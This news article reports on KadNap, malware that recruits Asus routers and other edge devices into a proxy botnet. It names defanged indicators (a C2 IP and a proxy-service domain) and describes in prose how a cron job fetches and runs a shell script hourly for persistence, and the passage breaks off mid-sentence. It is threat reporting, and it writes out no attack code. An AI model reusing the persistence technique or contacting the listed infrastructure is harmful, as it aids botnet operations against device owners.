KadNap Malware Infects 14,000+ Edge Devices to Power Stealth Proxy Botnet
KadNap Malware Infects 14,000+ Edge Devices to Power Stealth Proxy Botnet
https://thehackernews.com/2026/03/kadnap-malware-infects-14000-edge.html
Publish Date: 2026-03-10 12:00:00
Source Domain: thehackernews.com
Cybersecurity researchers have discovered a new malware called KadNap that’s primarily targeting Asus routers to enlist them into a botnet for proxying malicious traffic.
The malware, first detected in the wild in August 2025, has expanded to over 14,000 infected devices, with more than 60% of victims located in the U.S., according to the Black Lotus Labs team at Lumen. A lesser number of infections have been detected in Taiwan, Hong Kong, Russia, the U.K., Australia, Brazil, France, Italy, and Spain.
“KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring,” the cybersecurity company said in a report shared with The Hacker News.
Compromised nodes in the network leverage the DHT protocol to locate and connect with a command-and-control (C2) server, thereby making it resilient to detection and disruption efforts.
Once devices are successfully compromised, they are marketed by a proxy service named Doppelgänger (“doppelganger[.]shop”), which is assessed to be a rebrand of Faceless, another proxy service associated with TheMoon malware. Doppelgänger, according to its website, claims to offer resident proxies in over 50 countries that provide “100% anonymity.” The service is said to have launched in May/June 2025.
Despite the focus on Asus routers, the operators of KadNap have been found to deploy the malware against an assorted set of edge networking devices.
Central to the attack is a shell script (“aic.sh”) that’s downloaded from the C2 server (“212.104.141[.]140”), which is responsible for initiating the process of conscripting the victim to the P2P network. The file creates a cron job to retrieve the shell script from the server at the 55-minute mark of every hour, rename it to “.asusrouter,” and run it.
Once persistence is established, the script pulls a malicious ELF file, renames it to…
